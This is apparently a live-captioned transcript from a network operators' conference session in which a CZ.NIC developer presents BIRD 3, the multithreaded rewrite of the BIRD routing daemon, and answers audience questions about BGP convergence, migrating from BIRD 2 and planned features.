TOM STRICKX: You should.
WILL: Sorry, I think AS112, that's the one taking care of the ARPA stuff, but to what end? Because the primary point, at that point, is that you are being a waste basket for a bunch of weird packets, right? Yeah. I am not 100 percent sure what the value ‑‑
WILL: It was more a thought process, to see if anyone was thinking whether I was clever or totally stupid and not awake.
TOM STRICKX: No comment.
JAN ZORZ: Okay, there are no people in the queue. Are there any questions in text?
DMITRY KOHMANYUK: No. We missed one question from the last presentation, but the speaker knows about that. None for this one.
JAN ZORZ: Thank you, Tom, very much.
TOM STRICKX: Thanks, folks.
(Applause)
DMITRY KOHMANYUK: Maria, you are already here. Maria will present on the upcoming version, BIRD 3.
MARIA MATEJKA: Hello, I am from CZ.NIC and I have been a developer of the BIRD routing software for several years, I think since 2015. As for the 'quo vadis' in the title: a bird flies rather than walks, so it's 'quo volas', where are you flying?
Maybe this way. Okay. First of all, thank you; it's been a rough two years with the Covid pandemic, especially for people like me; we were locked in with lots of unrespecting people. But it's good now.
BIRD 3 has been a long-requested update, so I can now say that it's going to be here. But let's start with some history. I hope I got these dates correct; I may be off by a year or so somewhere, it's a common mistake. In 1998 there is the first commit in BIRD history; that commit adds a presentation in Czech, so there's no need to read it, or use Google Translate. Nobody has ever translated it, but it's a nice piece of history.
The code had been heavily optimised for x86, and when BIRD was released and the first development phase was finished, there was no notion of even a dual-core architecture. In 2005, the first dual-core CPU was announced for PCs; it was, I think, the Intel Core 2, and BIRD was by then quite done and working. And then there were lots of years when almost nothing happened. Anyway, all this time the BIRD creators thought that IPv4 was going to die. In 2017, we finally dropped this assumption and integrated IPv4 into the IPv6 version, and now we fully support running BIRD with IPv4 and IPv6 together. We were trying to push IPv4 out as hard as we could; we failed. Also in 2017, I think, the first 16-core CPU became available, so it's something like five years since there was a good reason to make BIRD run in parallel. So it's 2022, and here we come.
What is done? The new filter engine is done. It was completely impossible to make the old one run in parallel, so the first thing to be done was to rewrite the filter engine. The big thing about what happens inside BIRD now, in BIRD 2, is that routes are propagated as they come in; there is almost no delay, it just waits until there is some space on the wire. It's not possible to do that in a multithreaded environment, because we could get into lots of deadlocks when accessing the routing tables, so we had to make some breaking points, some queues, which also brings quite a lot of possibilities, like implementing minimum route advertisement intervals after lots of years when this was completely impossible in BIRD. So, for the people asking for flap dampening or something like that: yes, it will be there; not in BIRD 3.0, but it will be there.
The three things that are separated into their own threads are BGP, RPKI and pipes, where pipes are the things moving routes between two different tables. The non-blocking RPKI loading is quite crucial, because when you have lots of CPUs doing BGP, it's no longer one CPU doing BGP and sometimes checking RPKI; now it's all your CPUs doing BGP, and we don't take any liability for you locking yourself out of your router by running BIRD, just because you forgot to set a cgroup to confine BIRD to some subset of the CPUs and leave at least one core free for maintenance. We can't take any liability for you breaking your hardware; it's your fault.
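One possible way to do that confinement (an illustrative systemd drop-in using the cgroup v2 cpuset controller; the path and core numbers are examples, and on older systems CPUAffinity= is an alternative):

```
# /etc/systemd/system/bird.service.d/cpus.conf  (example path)
[Service]
# Confine BIRD to cores 0-5, leaving the rest free for maintenance
# such as the CLI.
AllowedCPUs=0-5
```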
Anyway, this also broke RPKI, so I had to give RPKI its own thread so it doesn't suffer from lots of BGP sessions. I want to say thank you to DE-CIX for testing: I spent almost three years doing that thing, then I finally managed to convince Ondrej Filip to release it, and after one afternoon I had three months or more of work to be done. Thank you, DE-CIX. Anyway, for now, please don't call ROA checks from the CLI in BIRD 3; it will just fail. There are some problems with memory management: if you have lots of CPUs and all of them need some memory and some buffering, it will eat more memory than before, but we are working quite hard to reduce it. And there are some problems with implementations from recent years; for example, there are some auxiliary tables implemented in such a bad way that they have to be completely rewritten, which is something I have been doing just about now. There are also some problems which I had completely forgotten about, for example MRT dumps: there are simply some parts of the internal API that I completely missed when doing the work. So if I can recommend anything to you: please do documentation, please do it even if you are doing little changes, and please do it from the beginning to the end and beyond. Document everything. Or you can get into my place; I know, I am the code cleaning lady, but I would like not to have to clean up such a mess. Also, because of how long this took, I couldn't merge BMP and Flow Spec validation, just because they used parts of the internal API that weren't there before, and the new API my colleague Andrei implemented was completely unmergeable with it, so we will have to rewrite parts of this as well.
And I also want to say sorry to all you BSD folks. It's been a long history of portability issues; we are trying our best, but you can see, even in this commit log (read it from the bottom up) there are three commits in one day, and hey, it's April 1: trying to fix some portability issues on BSD. There were obviously better days for Martin, but he did a good job, I must say.
Anyway, besides solving lots of our technical debt, I can also promise you, and it's something like salvation coming: we will have the JSON route export. Not in the first version of BIRD 3, but we will have it; it's possible now, and it hasn't been before. We are going to unify the route attribute names, so you don't have to check whether the BGP next hop is written in filters this way and in the attribute dump another way, just because some programmer, some developer, in 1999 decided to name this one thing differently in two places, to say it better. We will have non-blocking reconfiguration, which is something lots of people ask for. Well, I know some of you are parsing the configuration file for 20 seconds; we know it. We can't make this much faster, because it simply takes that time to parse all of your IP addresses; we are not the ones generating your gigabyte config files. But we can, finally, offload this reconfiguration, this parsing, to another CPU so it does not block the BGP. And, as far as I can remember, FreeBSD finally implemented, some years ago, a better synchronisation API for routes, so on FreeBSD we will probably be implementing that; on the others, we will just offload the route synchronisation to another thread.
So, that's it. Knowing what is broken, try BIRD 3, today, tomorrow, or any day, but please don't do the things I told you not to do. And put your BIRD into a cgroup. Thank you. Any questions?
(Applause)
JAN ZORZ: Thank you very much.
DMITRY KOHMANYUK: I have one text question; may I read it first?
JAN ZORZ: Read it.
DMITRY KOHMANYUK: If you send text questions, please do this before the speaker ends talking, so you get an answer. Alexander from Qrator Labs: Do you plan JSON export for other stuff, like show protocols?
MARIA MATEJKA: Well, I think it will come as well. The ultimate goal is to render birdwatcher obsolete.
TOM STRICKX: First of all, thanks for that; it's very much appreciated. Would it be possible to expand a bit on what your strategy is, I guess, to make BGP converge when you are multi-threading it? Because I guess you are treating tables differently?
MARIA MATEJKA: Sorry, I may have missed the point. Our strategy for BGP convergence?
TOM STRICKX: So how do you deal with the fact that you are running separate threads for separate neighbours, and how do you get to a point where you have a single unified forwarding table?
MARIA MATEJKA: Well, for now, the table has one lock, so it's synchronised on the table. In future there will probably be a lockless structure or something like that, to make it even faster. Anyway, the single source of truth is the table. And if something is in the table, it doesn't mean it's exported: in BIRD 3 there is a queue, a journal, which needs to be processed by every exporting connection, by every exporting protocol, to process the routes. In BIRD 1 and 2 these are actively pushed into the protocols; in BIRD 3 the protocols have to pick them up, which can lead to quite big buffers when one single protocol is taking its time to do everything it needs while the others are completely finished. In the worst case it can be something like all the updates that have come in since the beginning.
TOM STRICKX: Thank you.
SPEAKER: Very nice talk; I am from AMS-IX, by the way. I partially got my answer from the previous reply, that's good. Then I have a second question: when are these features, which look really promising, coming to, let's say, their final release?
MARIA MATEJKA: Well, the first goal is to make it stable and to fix the problems I was speaking about. So until the ROA checks are capable of being called from the CLI, you are getting no JSON. And on a quite personal note, I don't know whether you are going to get any JSON.
SPEAKER: Right.
MARIA MATEJKA: You remember me.
SPEAKER: I know. Then the second question: I know that a lot of us are still running BIRD 1.6.8 and maybe have plans to go to BIRD 2. Should we wait for BIRD 3, or should we go to BIRD 2 and give you some time to work on the bugs?
MARIA MATEJKA: That's a good question. I think it's okay to go to BIRD 2 because, as far as ‑‑ well ‑‑
SPEAKER: Well, going from one BIRD version to another is a painful process.
MARIA MATEJKA: At least three months ago, we thought it would be okay to move to BIRD 2, because the transition between BIRD 2 and BIRD 3 would just be locking BIRD into a cgroup. Anyway, it looks like we will have some little changes, like displaying the extended attributes of routes in a slightly different way. So if you are mostly concerned about the configuration, you may simply go to version 2; anyway, there are quite a lot of changes between version 1 and 2 in the CLI output.
SPEAKER: Yes.
MARIA MATEJKA: And there will be quite a substantial amount of changes, the other way, between 2 and 3.
SPEAKER: Okay.
MARIA MATEJKA: So if you are concerned about the CLI output, you should probably wait for BIRD 3.
SPEAKER: And the configuration, actually, the configuration file?
MARIA MATEJKA: The configuration file should remain almost the same. Anyway, if you managed to wait, well, it has been five years from the release of BIRD 2, you can wait another year.
SPEAKER: Thank you very much.
JAN ZORZ: So you are actually looking for more alpha testers, right?
MARIA MATEJKA: Well, in fact ‑‑
JAN ZORZ: More work.
MARIA MATEJKA: Well, in fact, there are some people who are already running it in production. Anyway, they don't call ROA checks from the CLI.
SPEAKER: Max Milan. Thanks for this; I know it's complicated. Are there any plans to implement IS-IS in BIRD 3?
MARIA MATEJKA: Implementing IS‑IS was quite a political issue several years ago. Anyway, now I think if we get enough time and people to do it, there is no problem with it. Also contributions are appreciated.
JAN ZORZ: Thank you. Are there any online questions?
DMITRY KOHMANYUK: No, I am double‑checking but it looks like we are done.
JAN ZORZ: Any other question? No? Three, two, one, go. Thank you.
(Applause)
JAN ZORZ: This is it for today; we are five minutes early for the break, but have a good coffee. Thank you.
LIVE CAPTIONING BY AOIFE DOWNES, RPR
DUBLIN, IRELAND